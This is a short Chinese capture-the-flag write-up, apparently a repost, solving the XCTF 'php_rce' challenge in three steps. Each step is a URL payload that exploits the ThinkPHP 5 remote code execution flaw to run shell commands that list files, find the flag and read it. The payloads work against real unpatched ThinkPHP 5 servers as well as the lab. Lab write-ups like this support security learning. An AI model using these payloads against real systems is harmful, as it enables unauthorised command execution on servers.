攻防世界-web-高手进阶区003-php_rce

Posted joker0xxx3

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了攻防世界-web-高手进阶区003-php_rce相关的知识,希望对你有一定的参考价值。

1.thinkphp5 rce漏洞构造payload

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("ls");%27

 

 

 

2.寻找flag

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("find / -name \'flag\'");%27

 

 

 

3.查看flag

?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat ../../../flag");%27

 

 

 

4.漏洞详情可查看,https://blog.csdn.net/qq_40884727/article/details/101452478

 


 

以上是关于攻防世界-web-高手进阶区003-php_rce的主要内容,如果未能解决你的问题,请参考以下文章

攻防世界 web高手进阶区 10分题 url

攻防世界web高手进阶区-ics-06

攻防世界-web-高手进阶区017-supersqli

攻防世界-web-高手进阶区002-Training-WWW-Robots

攻防世界web进阶区

攻防世界 web进阶区 NewsCenter